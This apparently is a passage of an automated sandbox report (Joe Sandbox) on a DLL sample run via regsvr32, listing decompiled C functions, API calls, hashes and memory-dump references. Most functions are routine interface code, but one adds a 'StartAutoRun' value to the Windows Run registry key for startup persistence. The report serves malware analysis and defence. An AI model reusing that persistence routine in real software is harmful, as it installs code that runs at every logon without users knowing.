                                                                                                                0x10014a50
                                                                                                                0x10014a55
                                                                                                                0x10014a57
                                                                                                                0x10014a6a
                                                                                                                0x10014a7e
                                                                                                                0x10014a83
                                                                                                                0x10014a85
                                                                                                                0x10014a8f
                                                                                                                0x10014a97
                                                                                                                0x10014a9d
                                                                                                                0x10014aa6
                                                                                                                0x10014aaf
                                                                                                                0x10014ab7
                                                                                                                0x10014ab7
                                                                                                                0x10014ac8
                                                                                                                0x10014ace
                                                                                                                0x10014ad5
                                                                                                                0x10014ad7
                                                                                                                0x10014adc
                                                                                                                0x10014ae3
                                                                                                                0x10014ae3
                                                                                                                0x10014af4
                                                                                                                0x10014b07
                                                                                                                0x10014b0f
                                                                                                                0x10014b14
                                                                                                                0x10014b20
                                                                                                                0x10014b34
                                                                                                                0x10014b3c
                                                                                                                0x10014b4b
                                                                                                                0x10014b60
                                                                                                                0x10014b69
                                                                                                                0x10014bad
                                                                                                                0x10014bb3
                                                                                                                0x10014b6b
                                                                                                                0x10014b6b
                                                                                                                0x10014b77
                                                                                                                0x10014b7a
                                                                                                                0x10014b7c
                                                                                                                0x10014b82
                                                                                                                0x10014b87
                                                                                                                0x10014b87
                                                                                                                0x10014b9b
                                                                                                                0x10014b9b
                                                                                                                0x10014bb9
                                                                                                                0x10014bbe
                                                                                                                0x10014bc0
                                                                                                                0x10014bc3
                                                                                                                0x10014bce
                                                                                                                0x10014bce
                                                                                                                0x10014bd7
                                                                                                                0x10014bda
                                                                                                                0x10014be8
                                                                                                                0x10014bec
                                                                                                                0x10014bef
                                                                                                                0x10014bf3
                                                                                                                0x10014bf9
                                                                                                                0x10014bf9
                                                                                                                0x10014bfb
                                                                                                                0x10014bfb
                                                                                                                0x10014bfe
                                                                                                                0x10014c0c
                                                                                                                0x10014c10
                                                                                                                0x10014c11
                                                                                                                0x10014c13
                                                                                                                0x10014c17
                                                                                                                0x10014c1d
                                                                                                                0x10014c1d
                                                                                                                0x10014c23
                                                                                                                0x10014c2e
                                                                                                                0x10014c3a
                                                                                                                0x10014c42
                                                                                                                0x10014c43
                                                                                                                0x10014c59

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,000000C8), ref: 10014AC8
                                                                                                                • RegCreateKeyA.ADVAPI32 ref: 10014B3C
                                                                                                                • SendMessageA.USER32 ref: 10014B60
                                                                                                                • RegSetValueExA.ADVAPI32(?,StartAutoRun,00000000,00000001,80000002,?), ref: 10014B9B
                                                                                                                  • Part of subcall function 10020058: __EH_prolog3.LIBCMT ref: 1002005F
                                                                                                                  • Part of subcall function 10020580: CloseHandle.KERNEL32(000000FF), ref: 1002058F
                                                                                                                  • Part of subcall function 10020580: GetLastError.KERNEL32(?,00000000,?,1002073F,00000010), ref: 100205B4
                                                                                                                  • Part of subcall function 1002001A: __EH_prolog3.LIBCMT ref: 10020021
                                                                                                                • RegDeleteValueA.ADVAPI32(?,StartAutoRun), ref: 10014BAD
                                                                                                                  • Part of subcall function 100206EF: __EH_prolog3_catch.LIBCMT ref: 1002070E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Value$CloseCreateDeleteErrorFileH_prolog3_catchHandleLastMessageModuleNameSendlstrlen
                                                                                                                • String ID: Setting\Setting.dat$Software\Microsoft\Windows\CurrentVersion\Run$StartAutoRun
                                                                                                                • API String ID: 4289712629-2829586130
                                                                                                                • Opcode ID: 56b2bb787a06b45600bf828ddd5e09ad9e0a278f48a5a13d5ae69a0177c20f41
                                                                                                                • Instruction ID: ccf439e5a121c42e3fe72ca45fff9ad8c9dfaaf31d5b8296b06331e40e596778
                                                                                                                • Opcode Fuzzy Hash: 56b2bb787a06b45600bf828ddd5e09ad9e0a278f48a5a13d5ae69a0177c20f41
                                                                                                                • Instruction Fuzzy Hash: 26617D352087419FE324CB24CC85F9AB7E5EF89310F104A1CF1999B2E1DB70E949CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021153 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E10021153(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E1003D219(E10053552, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E10023187(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E10023187(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E1001C7A2(_t103, _t104, 0, _t129, _t136, 0x10);
				E1001C7A2(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E1003D2BE(_t65);
					}
					E10001050(_t132 - 0x1c, _t124, E100173A6());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E100353FB(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x10070cc4; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1001B7F6(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E10020C3C, 0);
							E10001020( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E10019CBE(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E100353C4(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E10035322(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E1003505A(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E1003504C(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E10004290(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}
















                                                                                                                0x10021153
                                                                                                                0x10021153
                                                                                                                0x10021153
                                                                                                                0x10021153
                                                                                                                0x1002115a
                                                                                                                0x1002115f
                                                                                                                0x10021161
                                                                                                                0x10021166
                                                                                                                0x10021169
                                                                                                                0x10021173
                                                                                                                0x10021173
                                                                                                                0x1002117b
                                                                                                                0x10021180
                                                                                                                0x10021183
                                                                                                                0x10021186
                                                                                                                0x10021189
                                                                                                                0x10021193
                                                                                                                0x1002119a
                                                                                                                0x100211c7
                                                                                                                0x100211ca
                                                                                                                0x100211ca
                                                                                                                0x100211cc
                                                                                                                0x100211ae
                                                                                                                0x100211ae
                                                                                                                0x1002133b
                                                                                                                0x10021340
                                                                                                                0x10021340
                                                                                                                0x100211d7
                                                                                                                0x100211e5
                                                                                                                0x100211e9
                                                                                                                0x100211f6
                                                                                                                0x100211fb
                                                                                                                0x10021201
                                                                                                                0x10021203
                                                                                                                0x10021239
                                                                                                                0x10021239
                                                                                                                0x1002123b
                                                                                                                0x1002127c
                                                                                                                0x1002127c
                                                                                                                0x10021280
                                                                                                                0x10021285
                                                                                                                0x1002128a
                                                                                                                0x1002128d
                                                                                                                0x1002128f
                                                                                                                0x10021295
                                                                                                                0x10021291
                                                                                                                0x10021291
                                                                                                                0x10021291
                                                                                                                0x100212af
                                                                                                                0x100212b1
                                                                                                                0x100212b6
                                                                                                                0x100212d8
                                                                                                                0x100212db
                                                                                                                0x100212dd
                                                                                                                0x100212e5
                                                                                                                0x100212e8
                                                                                                                0x100212ea
                                                                                                                0x100212f1
                                                                                                                0x100212f1
                                                                                                                0x100212ea
                                                                                                                0x100212f7
                                                                                                                0x100212fc
                                                                                                                0x100212fe
                                                                                                                0x10021304
                                                                                                                0x10021304
                                                                                                                0x1002130a
                                                                                                                0x1002130c
                                                                                                                0x1002130e
                                                                                                                0x10021312
                                                                                                                0x10021315
                                                                                                                0x1002131b
                                                                                                                0x1002131b
                                                                                                                0x1002131b
                                                                                                                0x10021312
                                                                                                                0x1002131d
                                                                                                                0x10021320
                                                                                                                0x10021325
                                                                                                                0x1002132e
                                                                                                                0x1002132e
                                                                                                                0x10021336
                                                                                                                0x10021338
                                                                                                                0x10021338
                                                                                                                0x10021338
                                                                                                                0x00000000
                                                                                                                0x10021338
                                                                                                                0x1002123d
                                                                                                                0x10021241
                                                                                                                0x1002124c
                                                                                                                0x10021250
                                                                                                                0x10021260
                                                                                                                0x10021263
                                                                                                                0x10021267
                                                                                                                0x1002126c
                                                                                                                0x1002126f
                                                                                                                0x1002127a
                                                                                                                0x1002127a
                                                                                                                0x00000000
                                                                                                                0x1002126f
                                                                                                                0x10021205
                                                                                                                0x10021207
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021211
                                                                                                                0x10021213
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002121d
                                                                                                                0x10021224
                                                                                                                0x10021229
                                                                                                                0x1002122b
                                                                                                                0x1002122d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002122f
                                                                                                                0x10021234
                                                                                                                0x10021236
                                                                                                                0x10021236
                                                                                                                0x00000000
                                                                                                                0x10021234
                                                                                                                0x100211a1
                                                                                                                0x100211ac
                                                                                                                0x100211c3
                                                                                                                0x00000000
                                                                                                                0x100211c3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002115A
                                                                                                                • GetSystemMetrics.USER32 ref: 1002120B
                                                                                                                • GlobalLock.KERNEL32 ref: 10021274
                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,Function_00020C3C,00000000), ref: 100212A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                • String ID: MS Shell Dlg
                                                                                                                • API String ID: 1736106359-76309092
                                                                                                                • Opcode ID: 2bd783e259b33e7d17dff3db59fcb4434885c89f19cf30252cc6289074b54053
                                                                                                                • Instruction ID: f0c0048961803a188d9479126d767246e806f03dac1e22d9f8db8e56780ddc43
                                                                                                                • Opcode Fuzzy Hash: 2bd783e259b33e7d17dff3db59fcb4434885c89f19cf30252cc6289074b54053
                                                                                                                • Instruction Fuzzy Hash: DB51CC38900109DFCB01DFA8DC859EEBBB5EF14340FA44669F852EB192DB709E95CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000BA10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 60%
                                                                                                                			E1000BA10(void* __ecx, intOrPtr* _a8) {
				struct tagPOINT _v8;
				signed char _v12;
				signed char _v24;
				intOrPtr* _t25;
				long _t26;
				void* _t27;
				long _t38;
				long _t56;
				void* _t57;

				_t57 = __ecx;
				GetCursorPos( &_v8);
				ScreenToClient( *(_t57 + 0x570),  &_v8);
				_t58 = _t57 + 0x550;
				_t38 = E1002644D(_t57 + 0x550, _v8.x, _v8.y,  &_v12);
				if((_v24 & 0x00000040) == 0) {
					L7:
					if((_v12 & 0x00000010) == 0) {
						_t25 = _a8;
						 *_t25 = 0;
						return _t25;
					} else {
						_t26 = SendMessageA( *(_t57 + 0x570), 0x110b, 9, _t38);
						 *_a8 = 0;
						return _t26;
					}
				}
				_t27 = E10026483(_t58, _t38);
				_push(_t38);
				_push(9);
				_push(0x110b);
				_push( *(_t57 + 0x570));
				if(_t27 == 0) {
					SendMessageA();
					E1000B9A0(_t57, _t38, E10026483(_t58, _t38));
					goto L7;
				}
				SendMessageA();
				E1000B9A0(_t57, _t38, E10026483(_t58, _t38));
				_t56 = SendMessageA( *(_t57 + 0x570), 0x110a, 3, _t38);
				if(_t56 == 0) {
					goto L7;
				}
				do {
					E100264BC(_t58, _t56, 0);
					_t56 = SendMessageA( *(_t57 + 0x570), 0x110a, 3, _t56);
				} while (_t56 != 0);
				goto L7;
			}












                                                                                                                0x1000ba1c
                                                                                                                0x1000ba1e
                                                                                                                0x1000ba30
                                                                                                                0x1000ba44
                                                                                                                0x1000ba57
                                                                                                                0x1000ba59
                                                                                                                0x1000baee
                                                                                                                0x1000baf3
                                                                                                                0x1000bb1e
                                                                                                                0x1000bb25
                                                                                                                0x1000bb2f
                                                                                                                0x1000baf5
                                                                                                                0x1000bb04
                                                                                                                0x1000bb11
                                                                                                                0x1000bb1b
                                                                                                                0x1000bb1b
                                                                                                                0x1000baf3
                                                                                                                0x1000ba62
                                                                                                                0x1000ba67
                                                                                                                0x1000ba68
                                                                                                                0x1000ba72
                                                                                                                0x1000ba77
                                                                                                                0x1000ba78
                                                                                                                0x1000bad7
                                                                                                                0x1000bae9
                                                                                                                0x00000000
                                                                                                                0x1000bae9
                                                                                                                0x1000ba80
                                                                                                                0x1000ba8e
                                                                                                                0x1000baa4
                                                                                                                0x1000baa8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000bab0
                                                                                                                0x1000bab5
                                                                                                                0x1000bacf
                                                                                                                0x1000bad1
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 1000BA1E
                                                                                                                • ScreenToClient.USER32(?,?), ref: 1000BA30
                                                                                                                  • Part of subcall function 1002644D: SendMessageA.USER32 ref: 1002646D
                                                                                                                • SendMessageA.USER32 ref: 1000BB04
                                                                                                                  • Part of subcall function 10026483: SendMessageA.USER32 ref: 100264AB
                                                                                                                • SendMessageA.USER32 ref: 1000BAA2
                                                                                                                  • Part of subcall function 100264BC: SendMessageA.USER32 ref: 100264F3
                                                                                                                • SendMessageA.USER32 ref: 1000BAC9
                                                                                                                • SendMessageA.USER32 ref: 1000BA80
                                                                                                                  • Part of subcall function 1000B9A0: SendMessageA.USER32 ref: 1000B9B7
                                                                                                                  • Part of subcall function 1000B9A0: SendMessageA.USER32 ref: 1000B9F7
                                                                                                                • SendMessageA.USER32 ref: 1000BAD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientCursorScreen
                                                                                                                • String ID: @
                                                                                                                • API String ID: 41388912-2766056989
                                                                                                                • Opcode ID: c548239c1e9cad7334d0ffe076fdfb4e2767bc8ccbfcea1d6b00597f901cca94
                                                                                                                • Instruction ID: ca4faaaaeda8ceb0eeefa278f4bf7c19089cac7d599f38745f788febe4b2ceec
                                                                                                                • Opcode Fuzzy Hash: c548239c1e9cad7334d0ffe076fdfb4e2767bc8ccbfcea1d6b00597f901cca94
                                                                                                                • Instruction Fuzzy Hash: E1319075240B05ABE355DF24EC91FABB3ECEB88791F00041CFA4A97285EA64E9098761
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10035322(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1003B437(E100351D3(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                                0x10035328
                                                                                                                0x1003532f
                                                                                                                0x10035334
                                                                                                                0x1003533d
                                                                                                                0x10035340
                                                                                                                0x10035343
                                                                                                                0x10035348
                                                                                                                0x1003534c
                                                                                                                0x10035356
                                                                                                                0x10035365
                                                                                                                0x10035369
                                                                                                                0x10035376
                                                                                                                0x10035378
                                                                                                                0x1003537a
                                                                                                                0x1003537a
                                                                                                                0x10035395
                                                                                                                0x10035398
                                                                                                                0x10035398
                                                                                                                0x1003539e
                                                                                                                0x1003539e
                                                                                                                0x100353a4
                                                                                                                0x100353a6
                                                                                                                0x100353a6
                                                                                                                0x100353c1
                                                                                                                0x100353c1
                                                                                                                0x10035350
                                                                                                                0x10035354
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000011), ref: 10035348
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 10035350
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 1003535D
                                                                                                                • GetDC.USER32(00000000), ref: 1003536C
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10035380
                                                                                                                • MulDiv.KERNEL32 ref: 1003538C
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 10035398
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                • String ID: System
                                                                                                                • API String ID: 46613423-3470857405
                                                                                                                • Opcode ID: 0fd600e30f56e7e9ec9132b7e3b8a86ccef4c833f876d3372f946b32b9eb9cec
                                                                                                                • Instruction ID: b7d3908059a76e69d86433333f5f6da8d47bedefbba8974e8e49f0fc4b6b577f
                                                                                                                • Opcode Fuzzy Hash: 0fd600e30f56e7e9ec9132b7e3b8a86ccef4c833f876d3372f946b32b9eb9cec
                                                                                                                • Instruction Fuzzy Hash: 04114271A40268EBEB10DBA1DC85FAE77B8EB08782F050019F605AB1D1DBB19D019B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10002D70 Relevance: 13.9, APIs: 9, Instructions: 393windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10002D70(void* __ebx, void* __ecx, intOrPtr _a4) {
				struct HWND__* __edi;
				void* __esi;
				void* __ebp;
				signed char _t129;
				signed int* _t130;
				signed int* _t132;
				signed int* _t134;
				signed int* _t136;
				signed int* _t138;
				signed int _t141;
				void* _t142;
				signed int _t145;
				signed int _t148;
				void* _t149;
				signed int _t152;
				void* _t153;
				signed int _t157;
				void* _t165;
				signed int _t167;
				void* _t168;
				void* _t171;
				void* _t176;
				signed char _t201;
				signed char _t206;
				signed int* _t207;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed char _t228;
				intOrPtr _t229;
				intOrPtr _t231;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr _t237;
				void* _t239;
				void* _t241;
				void* _t243;
				void* _t244;
				signed char _t259;
				void* _t270;
				signed char _t285;
				signed char _t290;
				void* _t295;
				signed int _t296;
				intOrPtr _t297;

				_t220 = __ebx;
				_t297 = _a4;
				_t129 =  *(_t297 + 0x18);
				_t295 = __ecx;
				_t228 =  !_t129;
				_t301 = _t228 & 0x00000001;
				if((_t228 & 0x00000001) == 0) {
					__eflags = _t129 & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(4);
						E10020287(__ebx, _t270, __ecx, _t297, __eflags);
					}
					_t130 =  *(_t297 + 0x28);
					_t229 =  *((intOrPtr*)(_t297 + 0x2c));
					_t271 =  &(_t130[1]);
					__eflags =  &(_t130[1]) - _t229;
					if( &(_t130[1]) > _t229) {
						__eflags = _t130 - _t229 + 4;
						E1001FADC(_t297, _t271, _t130 - _t229 + 4);
					}
					 *(_t295 + 0x84) =  *( *(_t297 + 0x28));
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					__eflags =  *(_t297 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(4);
						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
					}
					_t132 =  *(_t297 + 0x28);
					_t231 =  *((intOrPtr*)(_t297 + 0x2c));
					_t272 =  &(_t132[1]);
					__eflags =  &(_t132[1]) - _t231;
					if( &(_t132[1]) > _t231) {
						__eflags = _t132 - _t231 + 4;
						E1001FADC(_t297, _t272, _t132 - _t231 + 4);
					}
					 *(_t295 + 0x74) =  *( *(_t297 + 0x28));
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					__eflags =  *(_t297 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(4);
						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
					}
					_t134 =  *(_t297 + 0x28);
					_t233 =  *((intOrPtr*)(_t297 + 0x2c));
					_t273 =  &(_t134[1]);
					__eflags =  &(_t134[1]) - _t233;
					if( &(_t134[1]) > _t233) {
						__eflags = _t134 - _t233 + 4;
						E1001FADC(_t297, _t273, _t134 - _t233 + 4);
					}
					 *(_t295 + 0x78) =  *( *(_t297 + 0x28));
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					__eflags =  *(_t297 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(4);
						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
					}
					_t136 =  *(_t297 + 0x28);
					_t235 =  *((intOrPtr*)(_t297 + 0x2c));
					_t274 =  &(_t136[1]);
					__eflags =  &(_t136[1]) - _t235;
					if( &(_t136[1]) > _t235) {
						__eflags = _t136 - _t235 + 4;
						E1001FADC(_t297, _t274, _t136 - _t235 + 4);
					}
					 *(_t295 + 0x7c) =  *( *(_t297 + 0x28));
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					__eflags =  *(_t297 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t297 + 0x14)));
						_push(4);
						E10020287(_t220,  *((intOrPtr*)(_t297 + 0x14)), _t295, _t297, __eflags);
					}
					_t138 =  *(_t297 + 0x28);
					_t237 =  *((intOrPtr*)(_t297 + 0x2c));
					_t275 =  &(_t138[1]);
					__eflags =  &(_t138[1]) - _t237;
					if( &(_t138[1]) > _t237) {
						__eflags = _t138 - _t237 + 4;
						E1001FADC(_t297, _t275, _t138 - _t237 + 4);
					}
					 *(_t295 + 0x80) =  *( *(_t297 + 0x28));
					 *(_t297 + 0x28) =  &(( *(_t297 + 0x28))[1]);
					_t141 =  *(_t295 + 0x84);
					__eflags = _t141;
					_t239 = _t295;
					if(_t141 == 0) {
						_t142 = E1001D1C2(_t239, 0x3fb);
						_push(0);
						_push(1);
						_push(0xf1);
						_push( *((intOrPtr*)(_t142 + 0x20)));
						goto L47;
					} else {
						__eflags = _t141 == 1;
						if(_t141 == 1) {
							_t176 = E1001D1C2(_t239, 0x3fc);
							_push(0);
							_push(1);
							_push(0xf1);
							_push( *((intOrPtr*)(_t176 + 0x20)));
							L47:
							SendMessageA();
						} else {
							E10018B24(_t239, 0x10056cf8, 0, 0);
						}
					}
					_t145 =  *(_t295 + 0x74);
					__eflags = _t145 - 3;
					if(_t145 > 3) {
						E10018B24(_t295, 0x10056cf8, 0, 0);
					} else {
						switch( *((intOrPtr*)(_t145 * 4 +  &M100031C0))) {
							case 0:
								SendMessageA( *(E1001D1C2(_t295, 0x3f7) + 0x20), 0xf1, 1, 0);
								goto L55;
							case 1:
